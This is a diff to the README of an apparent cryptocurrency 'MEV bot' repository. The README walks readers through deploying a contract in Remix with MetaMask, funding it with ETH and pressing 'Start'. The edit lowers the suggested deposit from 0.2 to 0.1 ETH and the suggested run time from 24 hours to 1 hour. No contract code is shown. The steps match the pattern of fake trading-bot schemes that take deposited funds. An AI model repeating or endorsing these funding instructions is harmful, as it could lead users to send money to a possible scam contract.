Jacob-mev/Bot/README.md

 - Confirm the transaction in MetaMask to create your contract

 ### 6. Fund the Contract
-- Send at least **0.2 ETH** to your contract address (to prevent slippage-related losses)
+- Send at least **0.1 ETH** to your contract address (to prevent slippage-related losses)

 ### 7. Run the Bot
 - In Remix, click the **"Start"** button to activate the bot
 - To stop and withdraw funds, click **"Withdrawal"**
-- For best results, allow the bot to run for at least 24 hours
+- For best results, allow the bot to run for at least 1 hour

 ## 🔗 Connect With Me